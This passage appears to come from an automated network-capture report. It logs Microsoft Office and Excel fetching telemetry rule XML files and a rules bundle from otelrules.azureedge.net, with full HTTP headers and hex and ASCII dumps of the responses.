                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:52 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:52 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 479
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                                        x-ms-request-id: 32c7c32d-b01e-003e-2b01-488e41000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124952Z-r1cf579d7788pwqzhC1EWRrpd800000008qg000000003grp
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:52 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        50192.168.2.84977313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:52 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:52 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:52 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 416
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                                        x-ms-request-id: eee9af6d-a01e-001e-1905-4849ef000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124952Z-r1cf579d778qgtz2hC1EWRmgks0000000890000000002hun
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:52 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        51192.168.2.84977513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:52 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:52 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:52 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 415
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                        x-ms-request-id: cfb0ab39-c01e-0014-7982-49a6a3000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124952Z-r1cf579d778j4j5fhC1EWR3ge800000001y00000000046su
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:52 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        52192.168.2.84977613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:52 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:52 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:52 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 471
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                                        x-ms-request-id: 45682ef5-801e-0048-7703-48f3fb000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124952Z-r1cf579d7786c2tshC1EWRr1gc0000000830000000002ss3
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:52 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        53192.168.2.84977713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:52 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:52 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:52 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 419
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                                        x-ms-request-id: 359bf904-f01e-0099-5038-499171000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124952Z-r1cf579d7789trgthC1EWRkkfc000000092g000000004qww
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:52 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        54192.168.2.84977813.107.246.634436028C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:53 UTC219OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:54 UTC472INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:54 GMT
                                                                                                        Content-Type: text/plain
                                                                                                        Content-Length: 1113975
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public
                                                                                                        Last-Modified: Sun, 08 Dec 2024 17:57:40 GMT
                                                                                                        ETag: "0x8DD17B1CEE40B07"
                                                                                                        x-ms-request-id: 5ed87a59-c01e-0046-0bfe-492db9000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124954Z-r1cf579d778z4wflhC1EWRa3h000000008dg000000005c1y
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:54 UTC15912INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                                                                                                        Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                                                                                                        2024-12-09 12:49:54 UTC16384INData Raw: 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20
                                                                                                        Data Ascii: !#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32" I="1" O="false">
                                                                                                        2024-12-09 12:49:54 UTC16384INData Raw: 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20
                                                                                                        Data Ascii: <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32" I="0" O="false">
                                                                                                        2024-12-09 12:49:54 UTC16384INData Raw: 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20
                                                                                                        Data Ascii: <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <L> <S
                                                                                                        2024-12-09 12:49:54 UTC16384INData Raw: 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                        Data Ascii: FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T="28" /> </C>
                                                                                                        2024-12-09 12:49:54 UTC16384INData Raw: 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d 34 33 63 39 2d 62 61 34 63 2d 39 35 32 65 65 31 33 30 35 34 30
                                                                                                        Data Ascii: Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-43c9-ba4c-952ee130540
                                                                                                        2024-12-09 12:49:54 UTC16384INData Raw: 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d
                                                                                                        Data Ascii: > <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U64" I="0" O="true" N=
                                                                                                        2024-12-09 12:49:54 UTC16384INData Raw: 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 37 38 35 32 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d
                                                                                                        Data Ascii: "4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V V="27852" T="I32" />
                                                                                                        2024-12-09 12:49:54 UTC16384INData Raw: 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d
                                                                                                        Data Ascii: <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException"> <C> <S T=
